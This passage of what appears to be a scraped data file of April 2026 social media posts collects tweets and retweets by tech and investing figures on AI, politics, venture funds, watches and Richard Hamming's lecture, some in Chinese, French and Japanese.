It's one of the only things on my site written by someone else.\n\nhttps://paulgraham.com/hamming.html", + "url": "https://nitter.net/paulg/status/2047944827887591681#m", + "published_at": "2026-04-25T07:44:30+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "R to @paulg: Auction houses could fix this by giving you timegrapher numbers. But the only auction house that does this so far is a small Swiss one that specializes in watches (Ineichen). None of the big houses do.", + "url": "https://nitter.net/paulg/status/2047942555254288757#m", + "published_at": "2026-04-25T07:35:28+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "The best way to buy art is at auction, once you know what you're doing. But old watches you should buy from dealers. You can get enough information about paintings to judge their condition, but you have no idea what's inside watches.", + "url": "https://nitter.net/paulg/status/2047941243234107691#m", + "published_at": "2026-04-25T07:30:15+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Incredible return on investment! 💰💰💰", + "url": "https://nitter.net/elonmusk/status/2047877294476116184#m", + "published_at": "2026-04-25T03:16:09+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "Steve Jurvetson has a knack for seeing the future more clearly than just about anyone. \n\nHere are some of his insights from his visit to my Lab.\n\n@FutureJurvetson @Stanford @DigEconLab", + "url": "https://nitter.net/erikbryn/status/2047874760542200042#m", + "published_at": "2026-04-25T03:06:05+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "SPLC invested $270k in Charlottesville and got $81 million in additional donations. Extraordinary returns.", + "url": "https://nitter.net/DavidSacks/status/2047871382923469241#m", + "published_at": "2026-04-25T02:52:39+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "Marc Benioff is the apex cloud founder. He and Salesforce have turned every previous technology wave to their advantage. Cloud, social, mobile, big data. I predict AI will be no different.", + "url": "https://nitter.net/DavidSacks/status/2047867592790946189#m", + "published_at": "2026-04-25T02:37:36+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "WTF are these lunatics up to…", + "url": "https://nitter.net/Jason/status/2047858837319774540#m", + "published_at": "2026-04-25T02:02:48+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "WTF are these kids up to?!", + "url": "https://nitter.net/Jason/status/2047857845387845816#m", + "published_at": "2026-04-25T01:58:52+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: SACKS: “We're really lucky that [Trump] is President … when this AI revolution is happening.”\n\nJASON: “What would happen if Kamala ‘Ding Dong’ was in right now?”\n\nSACKS: “We'd have no data centers, they'd be using AI to censor us, and they'd be promoting DEI values through AI.”", + "url": "https://nitter.net/TheChiefNerd/status/2047842000632713369#m", + "published_at": "2026-04-25T00:55:54+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "this was a good week.\n\nproud of the team.\n\nhappy building!", + "url": "https://nitter.net/sama/status/2047823357635354814#m", + "published_at": "2026-04-24T23:41:49+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: David Sacks: We're lucky that Trump's the President when this AI revolution is happening.\n\n@Jason \"Do an alt history, Sacks, what would happen if Kamala Ding Dong was in right now?\"\n\n@DavidSacks \"We'd have no data centers, and they'd be using AI to censor us, and they'd be promoting DEI values through AI. That was in the Biden executive order.\n\nPresident Trump just wants the country to win and be successful.", + "url": "https://nitter.net/jayplemons/status/2047823154655932696#m", + "published_at": "2026-04-24T23:41:01+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "RT by @erikbryn: Interesting study by @erikbryn and @avi_collis showing big consumer welfare gains from AI. Reminds us that large portion of the economic value of AI will not show up in traditional economic indicators. https://digitaleconomy.stanford.edu/publication/what-is-generative-ai-worth/", + "url": "https://nitter.net/RonnieChatterji/status/2047821064437424288#m", + "published_at": "2026-04-24T23:32:43+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: Planning an event usually means juggling dozens of vendors, scattered payments, and zero visibility. It's a logistical mess.\n\nLAMAT is fixing the chaos. It's a marketplace that lets organizations discover, book, and manage every event service on a single platform.", + "url": "https://nitter.net/LAUNCH/status/2047813100091449428#m", + "published_at": "2026-04-24T23:01:04+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: POD UP! Core four is back 🚨\n\nBig show:\n\n-- SpaceX-Cursor deal, using compute as leverage\n\n-- SaaS debt bomb coming to PE?, venture debt risk\n\n-- Software bloodbath, buy low potential?\n\n-- New Apple CEO: future of the company\n\n-- SPLC indictment, major allegations, out of control NGOs\n\n-- Science Corner returns! Colon cancer cause discovered?\n\n(0:00) Bestie intros!\n\n(4:55) SpaceX-Cursor deal, compute as leverage\n\n(18:33) SaaS bloodbath, debt bomb incoming, buy the dip?\n\n(46:20) New Apple CEO: John Ternus succeeds Tim Cook, what's next for Apple?\n\n(1:00:32) SPLC indictment, out of control NGOs\n\n(1:19:03) Science Corner: Potential cause discovered for colon cancer spike in young people", + "url": "https://nitter.net/theallinpod/status/2047808256047821141#m", + "published_at": "2026-04-24T22:41:49+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "This week I got to sit down with two truly generational CEOs and ask them anything: \n\n@tobi @Shopify ($160BN Market Cap)\n\nAdam Foroughi @AppLovin ($160BN Market Cap)\n\nI have the best job in the world.", + "url": "https://nitter.net/HarryStebbings/status/2047792195868967172#m", + "published_at": "2026-04-24T21:38:00+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "GPT-5.5 and GPT-5.5 Pro are now available in the API!", + "url": "https://nitter.net/sama/status/2047787124846653895#m", + "published_at": "2026-04-24T21:17:51+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Number of people who go bankrupt every year because of medical bills or illness-related work loss:\n\n🇦🇺 0\n🇨🇦 0\n🇩🇰 0\n🇫🇮 0\n🇫🇷 0\n🇩🇪 0\n🇮🇸 0\n🇮🇪 0\n🇮🇹 0\n🇯🇵 0\n🇳🇱 0\n🇳🇴 0\n🇵🇹 0\n🇪🇸 0\n🇸🇪 0\n🇬🇧 0\n🇺🇸 530,000\n\nThere’s a lesson there.", + "url": "https://nitter.net/Strandjunker/status/2047780272297382384#m", + "published_at": "2026-04-24T20:50:37+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: BREAKING: A Syrian billionaire needed U.S. sanctions lifted so he could cash in on $12 billion in reconstruction contracts, per NYT.\n\nIn an attempt to influence American foreign policy, he proposed a Trump-branded golf course, cut Jared Kushner & Ivanka Trump into a multibillion-dollar real estate deal for a resort in Albania, and had someone physically deliver a stone engraved with the Trump family crest to a Republican Member of Congress with instructions to take it to the White House to get the President's attention.\n\nTrump threw his weight behind repealing the sanctions. They were lifted. The contracts are moving, and the Trump family’s deals are expanding.", + "url": "https://nitter.net/unusual_whales/status/2047761493274571036#m", + "published_at": "2026-04-24T19:36:00+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: New episode of The Information Bottleneck is out, this time with @liuzhuang1234 (Princeton).\n\nWe talked about ConvNeXt and whether architecture still matters; dataset bias and what \"good data\" actually looks like; ImageBind and why vision is the natural bridge across modalities; CLIP's blind spots; memory as the real bottleneck behind the agent hype; whether LLMs have world models; and Transformers Without Normalization.\n\nFor years, the vision community debated what actually matters: architecture, inductive bias, self-attention vs convolution. After a lot of back-and-forth, we ended up in a funny place: ViT and ConvNet give roughly the same performance once you tune the details.\n\nWhat I find interesting is that once you reach a certain performance level, it becomes much easier to swap and tweak components without really changing the outcome.\n\nTalking to Zhuang on this episode, I kept wondering whether the same is now true for LLMs. If we wil spent serious time on an alternative architecture today, would you actually get a meaningfully different model, or just land on the same Pareto curve with extra steps?\n\nI'm starting to suspect it's the latter. Architecture matters less than we think. Data, compute, and a handful of pillars do most of the work.", + "url": "https://nitter.net/ziv_ravid/status/2047760455679246500#m", + "published_at": "2026-04-24T19:31:52+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: Baby’s first con", + "url": "https://nitter.net/Aaron_Margolin/status/2047748882952778044#m", + "published_at": "2026-04-24T18:45:53+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "RT by @eladgil: Adopting Claude speak in my regular life, episode 1:\n\nPartner: Did you do the dishes tonight?\nMe: Yes they're done.\nPartner: Why are they still dirty?\nMe: You're right to push back. I didn't actually do them.", + "url": "https://nitter.net/awnihannun/status/2047748613976264835#m", + "published_at": "2026-04-24T18:44:49+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: The web is disappearing 🕳️\n\nAccording to a Pew Research Center report, 26% of pages from 2013-2023 are no longer accessible.\n\nBut that’s not the whole story.\n\nIn a new study published in Internet Archive's book, VANISHING CULTURE, data scientists working with the Wayback Machine have found:\n16% have been restored through the Wayback Machine.\n56% are preserved before they disappear.\n\nPreservation is the remedy for cultural loss.\n\n📚 Read VANISHING CULTURE free from the Internet Archive \n\n📖 Download & read: https://archive.org/details/vanishing-culture-2026\n🛒 Purchase in print: https://www.betterworldbooks.com/product/detail/vanishing-culture-a-report-on-our-fragile-cultural-record-9798995425014/new \n\n#VanishingCulture #DigitalMemory #InternetArchive #BookTwitter", + "url": "https://nitter.net/internetarchive/status/2047733594064408894#m", + "published_at": "2026-04-24T17:45:08+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: Bring home a bundle of cuteness with the #tokidoki Baby Unicorno Series! 🦄🍼💖 Available on our website!", + "url": "https://nitter.net/tokidoki/status/2047723587528782152#m", + "published_at": "2026-04-24T17:05:22+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "R to @DavidSacks: UPDATE: the DOJ has joined @xAI’s lawsuit against Colorado on First Amendment grounds. AI models should not be required to alter truthful output to comply with DEI.", + "url": "https://nitter.net/DavidSacks/status/2047717649849659586#m", + "published_at": "2026-04-24T16:41:47+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: Good morning! Rise and shine, gamers!", + "url": "https://nitter.net/shopculturefly/status/2047711254379393160#m", + "published_at": "2026-04-24T16:16:22+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: David Sacks on Anthropic-Pentagon dispute, Musk-Altman feud and SpaceX-Cursor deal:\nhttps://cnb.cx/4d3HAKp", + "url": "https://nitter.net/SquawkCNBC/status/2047703023690924289#m", + "published_at": "2026-04-24T15:43:39+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: 图灵奖获得者、 AI 三大教父之一的 LeCun在达沃斯的发言,算是把整个硅谷的遮羞布扯了。\n\n他说现在整个行业都被LLM彻底洗脑了,所有人都在同一条赛道上互相挖人,谁敢偏离主流谁就被骂落后。\n\n这也是他离开Meta的真正原因,连Meta都已经LLM-pilled,他不想再跟风了。\n\n最扎心的一句话是:纯生成式架构,不管是LLM、VLM还是VLA,永远造不出哪怕猫级的智能体。\n\n因为它们本质上只是下一个token预测机,只能在文字和像素的空间里做统计关联,从来没有真正理解过这个世界的因果。\n它们不会预测行动的后果,不会真正的规划,更没有常识。\n\n当然,我不是说LLM没用,短期来看,scaling LLM+微调+工具调用,已经能吃掉80%的白领工作,硅谷所有人往这里冲,也算是完全理性,毕竟钱和机会就在这里。\n\n但长期来看,这是一条有天花板的路。因为你永远不可能在文字地图上,开出一辆真正的车。\n机器人、具身智能、长期自主代理、真正的科学发现,这些坎,纯LLM永远跨不过去。\n\nLeCun说,真正的智能必须有世界模型。就是说给定当前的状态和你要做的动作,你要能准确预测下一秒世界会变成什么样。不是简单的像素级的生成,还需要对物理规律和因果关系的抽象建模。\n\n最近Figure、特斯拉、谷歌的机器人项目,其实都在偷偷补这一课,只是没人愿意公开说,LLM不是万能地基。\n\n我理解未来真正的智能,一定是混合栈,LLM负责语言交互和符号推理,世界模型负责因果预测和长期规划,执行层负责把计划变成动作。\n\nLeCun从来没说过要抛弃LLM,他只是反对把LLM当成一切的答案。\n\n硅谷现在最可怕的问题不是卷,是所有人都在同一条赛道上卷得太狠,以至于忘了终点其实根本不在这条赛道上。\n\n世界模型这道坎,迟早要跨。\n而谁先跨过去,谁就是下一个时代的赢家。\n#YannLeCun #世界模型 #AGI #大模型 #具身智能", + "url": "https://nitter.net/AYi_AInotes/status/2047697898989572176#m", + "published_at": "2026-04-24T15:23:18+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: .@DavidSacks: \"We know that @AnthropicAI makes good products. They are smart people, there’s no question about it... we don’t care what their personal views are. What we care about are the quality of their products, and we don’t want the bias creeping into the products.\"", + "url": "https://nitter.net/RapidResponse47/status/2047694657107165519#m", + "published_at": "2026-04-24T15:10:25+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "How Claude Design Will Hurt Figma\n\n\"Claude Design will not replace Figma directly, but it will chip away at it.\n\nIt removes the need to wait for designers by letting people go straight from idea to product.\n\nThat bypass is the real threat, not a head-on competitor.\" @jasonlk\n\nLove to hear your thoughts on this @zoink @andrew__reed @karrisaarinen", + "url": "https://nitter.net/HarryStebbings/status/2047693043080261672#m", + "published_at": "2026-04-24T15:04:00+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "🫶", + "url": "https://nitter.net/sama/status/2047683787828703289#m", + "published_at": "2026-04-24T14:27:13+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: A mathematician who shared an office with Claude Shannon at Bell Labs gave one lecture in 1986 that explains why some people win Nobel Prizes and other equally smart people spend their whole lives doing forgettable work.\n\nHis name was Richard Hamming. He won the Turing Award. He invented error-correcting codes that made modern computing possible. And he spent 30 years at Bell Labs sitting in a cafeteria at lunch watching which scientists became legendary and which ones faded into nothing.\n\nIn March 1986, he walked into a Bellcore auditorium in front of 200 researchers and told them exactly what he had seen.\n\nHere's the framework that has been quoted by every serious scientist for the last 40 years.\n\nHis opening line landed like a punch. He said most scientists he worked with at Bell Labs were just as smart as the Nobel Prize winners. Just as hardworking. Just as credentialed. And yet at the end of a 40-year career, one group had changed entire fields and the other group was forgotten by the time they retired.\n\nHe wanted to know what the difference actually was. And he said it wasn't luck. It wasn't IQ. It was a specific set of habits that almost nobody is willing to follow.\n\nThe first habit was the one that hurts the most to hear. He said most scientists deliberately avoid the most important problem in their field because the odds of failure are too high. They pick a safe adjacent problem, solve it cleanly, publish it, and move on. And because they never swing at the hard problem, they never hit it. He said if you do not work on an important problem, it is unlikely you will do important work. That is not a motivational line. That is a logical one.\n\nThe second habit was about doors. Literal doors. He noticed that the scientists at Bell Labs who kept their office doors closed got more done in the short term because they had no interruptions. But the scientists who kept their doors open got more done over a career. The open-door scientists were interrupted constantly. They also absorbed every new idea passing through the hallway. Ten years in, they were working on problems the closed-door scientists did not even know existed.\n\nThe third habit was inversion. When Bell Labs refused to give him the team of programmers he wanted, Hamming sat with the rejection for weeks. Then he flipped the question. Instead of asking for programmers to write the programs, he asked why machines could not write the programs themselves. That single inversion pushed him into the frontier of computer science. He said the pattern repeats everywhere. What looks like a defect, if you flip it correctly, becomes the exact thing that pushes you ahead of everyone else.\n\nThe fourth habit was the one that hit me the hardest. He said knowledge and productivity compound like interest. Someone who works 10 percent harder than you does not produce 10 percent more over a career. They produce twice as much. The gap doesn't add. It multiplies. And it compounds silently for years before anyone notices.\n\nHe finished the lecture with a line I have never been able to shake.\n\nHe said Pasteur's famous quote is right. Luck favors the prepared mind. But he meant it literally. You don't hope for luck. You engineer the conditions where luck can land on you. Open doors. Important problems. Inverted questions. Compounded hours. Those are not traits. Those are choices you make every single day.\n\nThe transcript has been sitting on the University of Virginia's computer science website for almost 30 years. The video is free on YouTube. Stripe Press reprinted the full lectures as a book in 2020 and Bret Victor wrote the foreword.\n\nHamming died in 1998. He gave his final lecture a few weeks before. He was 82.\n\nThe lecture that explains why some careers become legendary and others disappear is still free. Most people who could benefit from it will never open it.", + "url": "https://nitter.net/ihtesham2005/status/2047680485208531152#m", + "published_at": "2026-04-24T14:14:06+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Feel like very few serious people make the argument Britain should develop its own LLM? Certainly not an argument you see made in Westminster often during the sovereignty debate. \n\nAlso some other eyebrow-raising sections in this interview.", + "url": "https://nitter.net/Discoplomacy/status/2047676640059154653#m", + "published_at": "2026-04-24T13:58:49+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "R to @DavidSacks: Full article:\n\nhttps://www.wsj.com/lifestyle/careers/are-college-graduates-finally-catching-a-break-in-this-job-market-38c37541?st=fxk6Dg&reflink=article_copyURL_share", + "url": "https://nitter.net/DavidSacks/status/2047672359377588241#m", + "published_at": "2026-04-24T13:41:49+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "Narrative violation: Hiring of new college graduates is up 5.6% over last year. Youth unemployment for degreed 20–24‑year‑olds fell to 5.3% from 8.9%. Weren’t we told that 50% of entry-level jobs were going away?", + "url": "https://nitter.net/DavidSacks/status/2047671706660073767#m", + "published_at": "2026-04-24T13:39:13+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: The Arxiv for the new Decoupled DiLoCo paper is now up: https://arxiv.org/abs/2604.21428v1", + "url": "https://nitter.net/JeffDean/status/2047665074471387456#m", + "published_at": "2026-04-24T13:12:52+00:00" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: Fundrise VCX is exactly why USVC needs to exist.\n\nRetail wants access to OpenAI, Anthropic, SpaceX, xAI, etc. That demand is not going away.\n\nVCX turned that demand into a liquid public wrapper that still trades around 4-5x NAV.\n\nAt today’s ~$90 price vs. recent NAV references around ~$19, buyers may be paying roughly $4-5 for every $1 of actual private tech exposure.\n\nAccess at the wrong price is not access. It’s just scarcity monetized.\n\nYes, venture has fees. It always has. You pay for access, selection, and portfolio construction.\n\nBut paying venture fees is very different from paying 4-5x NAV for the wrapper before the venture return even happens.\n\nThe companies inside VCX can be great and retail can still get wrecked if the premium collapses.\n\nUSVC is the cleaner answer: diversified private tech exposure, SEC-registered, available to unaccredited investors, and bought around NAV instead of through a hyped public wrapper trading miles above its assets.\n\nThe real test for me is simple: my mom wants to invest in startups/private tech.\n\nI would rather she do USVC 100x over VCX, because at least with USVC I can understand the structure, explain the tradeoffs, and know she is not just paying a massive public-market hype premium for the wrapper.\n\nIn venture, access matters.\n\nBut the wrapper can still ruin the investment. And right now, some products are monetizing retail demand for private AI/startup exposure more than they are solving it.\n\nUSVC is at least aimed at the right problem.", + "url": "https://nitter.net/alexbass/status/2047645157080658335#m", + "published_at": "2026-04-24T11:53:43+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "Im genuinely this Close to killing myself rn & this Shit happens like Okay", + "url": "https://nitter.net/satoshibun/status/2047641832624893993#m", + "published_at": "2026-04-24T11:40:30+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: 1. I never said LLMs were not useful. They are, particularly with all the bells and whistles that are being added to them. I use them.\n2. A robot-rich future can't be built with AIs that don't understand the physical world and don't anticipate the consequences of their actions. And LLMs really don't.\n3. The future in the cartoon looks pretty dystopian TBH, but even a non-dystopian version will require world models and zero-shot planning abilities.\n4. I rarely wear a suit and absolutely never wear a tie.\n5. I would never ever place a coffee mug on top of a piece equipment.\n6. I hope I'll look this young in 2032.", + "url": "https://nitter.net/ylecun/status/2047636569767419951#m", + "published_at": "2026-04-24T11:19:36+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: How do Delilah Defenders actively defend her actions with these Toons literally existing.\n\nI just don't get it", + "url": "https://nitter.net/DaCapTainXD/status/2047633324676440561#m", + "published_at": "2026-04-24T11:06:42+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: 🎓 Register now for ML & Advanced Stats Summer School, an intensive set of courses on theoretical foundations & applications of ML methods & modern stats analysis techniques.\n\nWith @ELLISUnitMadrid.\n\n📍 Madrid 🇪🇸 \n📅 June 8-19th\n⏰ Apply by June 3rd\n🔗 https://cig.fi.upm.es/mlas/", + "url": "https://nitter.net/ELLISforEurope/status/2047624126047670758#m", + "published_at": "2026-04-24T10:30:09+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: 😾", + "url": "https://nitter.net/aaa___kanato/status/2047606779677376714#m", + "published_at": "2026-04-24T09:21:13+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: ♦️━━━━━━━━━━━━━♣️\n⠀⠀⠀⠀⠀⠀⠀『#文字化化』\n⠀「不思議の国のアリス」テーマ\n⠀グラフアート新商品発売決定!\n♠️━━━━━━━━━━━━━♥️\n\n📅5/23~6/5\n📍eeo Store 池袋本店\n🛒通販でも販売開始!:https://eeo.today/store/101/title/6785?utm_source=twitter&utm_medium=social&utm_campaign=20260424_MJBK\n\n商品詳細はURLとツリーをチェック🎩🐰\n\n#Homicipher", + "url": "https://nitter.net/eeo_store/status/2047586383519531500#m", + "published_at": "2026-04-24T08:00:10+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: 🔴 Trump vient de publier sur Truth Social un monologue de 1 500 mots sur le droit du sol, l'ACLU, les Indiens, les Chinois et la \"Savage Nation\". Ce texte inhabituellement long, inhabituellement cohérent, mérite une lecture attentive. Il révèle bien plus qu'une opinion sur l'immigration.\n\n▶️ Commençons par l'évidence que tout le monde remarque : ce texte n'a pas été écrit par Donald Trump.\nTrump écrit en majuscules intempestives, en phrases courtes, avec des digressions abruptes et une syntaxe chaotique. Ce texte est long, structuré, argumenté, avec une progression rhétorique délibérée, une introduction, des exemples, une montée en puissance émotionnelle, une conclusion en appel à l'action. C'est la marque de fabrique de Stephen Miller, architecte de la politique migratoire de Trump depuis dix ans, dont l'organisation America First Legal est précisément celle qui a construit les arguments juridiques soumis à la Cour Suprême. \n\nMiller rédige. Trump signe. C'est une mécanique documentée depuis des années.\n\n▶️ Ce qui rend ce texte particulièrement remarquable, c'est son timing et son objectif.\n\nLe 1er avril, Trump a assisté en personne aux plaidoiries de la Cour Suprême sur le droit du sol, la première fois dans l'histoire américaine qu'un président en exercice assiste à des arguments oraux devant la Cour. \n\nLa majorité des juges, y compris ceux nommés par Trump lui-même, ont exprimé un scepticisme marqué.\n\nCe post fleuve publié dans les jours suivants n'est pas une réflexion spontanée. C'est une tentative d'influencer l'opinion publique, et peut-être les juges eux-mêmes, avant que la décision ne tombe en juin. \n\nVenons-en aux affirmations les plus choquantes du texte, point par point.\n\n▶️ \"Nous sommes le seul pays au monde assez stupide pour autoriser le droit du sol.\" C'est factuellement faux. Une trentaine de pays garantissent la citoyenneté aux enfants nés sur leur territoire, dont le Canada, le Mexique, le Brésil et l'Argentine. \n\n▶️ Trump écrit en substance que les Indiens et les Chinois qu'il qualifie de \"gangsters with laptops\", occupent toutes les places dans la tech californienne, que les Blancs n'ont plus leur chance, et que ce n'est plus leur pays. \n\nLes ingénieurs d'origine indienne et chinoise sont les architectes de l'économie technologique américaine, la même économie dont Trump se félicite en permanence. Google, Microsoft, Adobe, IBM, Palo Alto Networks, Arista Networks : autant de géants américains dirigés par des PDG d'origine indienne. \n\nSelon le rapport Stanford HAI 2026, les États-Unis investissent 285 milliards en IA et 80% des chercheurs en IA américains sont nés à l'étranger. Expulser ou décourager ces populations, c'est amputer l'innovation américaine au bénéfice de la Chine, l'adversaire que Trump prétend combattre.\n\n▶️ L'ACLU (American Civil Liberties Union, organisation fondée en 1920 pour défendre les libertés constitutionnelles américaines) est qualifiée \"d'organisation criminelle, la plus dangereuse de l'histoire des États-Unis,\" plus dangereuse que l'Iran. Trump écrit qu'elle \"a fait plus de dégâts à ce pays que l'Iran n'en a jamais fait\" et appelle à la poursuivre sous une loi antimafia. \n\n▶️ \"Le melting pot est terminé. C'est juste une marmite à cash.\" Le melting pot (le creuset en français), est le mythe fondateur de l'identité américaine depuis deux siècles. Lithuaniens, Roumains, Russes, Polonais, Italiens : Trump les cite lui-même comme exemples de bonnes intégrations. Il oublie de mentionner que ces vagues migratoires européennes ont elles aussi été accueillies avec les mêmes discours : les Irlandais traités de sous-humains, les Italiens lynchés, les Polonais moqués pour leur manque de loyauté. L'histoire se répète. Seule la nationalité des boucs émissaires change.\n\n📕 Dans Le Pantin de la Maison Blanche, j'analyse comment Stephen Miller, idéologue de l'immigration ethno-nationaliste depuis vingt ans, utilise Trump comme amplificateur de sa vision du monde. Ce texte en est la démonstration la plus pure.\n\nL'Amérique a été construite par les enfants de ceux que ce texte veut expulser. Jensen Huang, NVIDIA, l'entreprise qui alimente la révolution IA mondiale, est né à Taïwan. Sundar Pichai, Google, est né en Inde. Satya Nadella, Microsoft, est né en Inde. Chacun d'eux est le produit d'une Amérique qui croyait encore à la vertu de ce fameux meltin pot. Ce texte leur dit que cette Amérique est terminée.\n\n📖 Le Pantin de la Maison Blanche → https://www.amazon.fr/dp/B0GPCCMS68/", + "url": "https://nitter.net/cginisty/status/2047565736382534091#m", + "published_at": "2026-04-24T06:38:08+00:00" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "R to @naval: x.com/avlok/status/204754692…", + "url": "https://nitter.net/naval/status/2047550896670908809#m", + "published_at": "2026-04-24T05:39:10+00:00" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: I’ve seen a lot of questions about USVC, AngelList’s newest product. First, don’t invest in venture capital if you can’t afford to lose your money. Put your savings somewhere safer. But if you’re considering USVC, here’s a thread that answers the most common questions and explains how it works:", + "url": "https://nitter.net/avlok/status/2047546920747307466#m", + "published_at": "2026-04-24T05:23:22+00:00" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "I've been thinking about local LLMs a lot these days.", + "url": "https://nitter.net/liuliu/status/2047527371486658814#m", + "published_at": "2026-04-24T04:05:41+00:00" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "Hari nails it:\n\n“Don’t listen to people who don’t know how private markets work.”", + "url": "https://nitter.net/naval/status/2047520212787015748#m", + "published_at": "2026-04-24T03:37:14+00:00" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "R to @naval: x.com/haridigresses/status/2…", + "url": "https://nitter.net/naval/status/2047519250433421604#m", + "published_at": "2026-04-24T03:33:25+00:00" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "R to @naval: x.com/nivi/status/2047471220…", + "url": "https://nitter.net/naval/status/2047510419565420779#m", + "published_at": "2026-04-24T02:58:19+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "New life plan-\n \nMove to Brooklyn\nGet neck tat\nRide bike everywhere\nCold brew own coffee (also start drinking coffee)\nAdopt 12 year old stray cat, name him Nietzsche\nVape mango pods, but ironically\nWear scarf everywhere during summer", + "url": "https://nitter.net/eladgil/status/2047489459378397604#m", + "published_at": "2026-04-24T01:35:02+00:00" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: USVC is a new fund being offered by Naval, it's been discussed widely on X. I have some thoughts and why people should look into it. I have no connection with it and not being paid to shill. \n\nBack when I started dating my wife, I told her to set up a Roth IRA and buy Apple. Every year, I'd have her put the max limit into a Roth IRA and buy Apple. Apple was $20 or so. When I checked it earlier this year, I was blown away. It was a small mount of money that grew into something nice.\n\nApple, Facebook, Nvidia, Tesla, etc. would IPO early. You could have MASSIVE outsized gains if you were investing in the early 2010's. \n\nYou couldn't get into them pre-IPO unless you had a connection. There are people on this site who pretend to be geniuses because a friend hooked them up with a tag-along investment into the seed round of Uber. It was a bro favor, good for them, they do leave that part out tho and let the false narrative of being a genius investor flow through. \n\nYou used to be able to buy in pre-IPO with a small check. Now it's almost impossible unless you have a friend, and they set up an SPV, they are usually doing you a favor, because huge funds and institutional investors gobble it all up. (This has also lead to the VC class screwing themselves over, because if you can't buy today's version of Apple at $20, because all the big gains are sucked up before the public offering, then why do you have buy in into this entire system?)\n\nYou could, as a small investor, get huge results pre-IPO via a small check, or also do well after the IPO, because companies IPO'ed earlier. Ie Apple at $20, Amazon in the 20's, etc.\n\nIt's very hard to get big gains now, because companies remain private much longer. Many companies don't 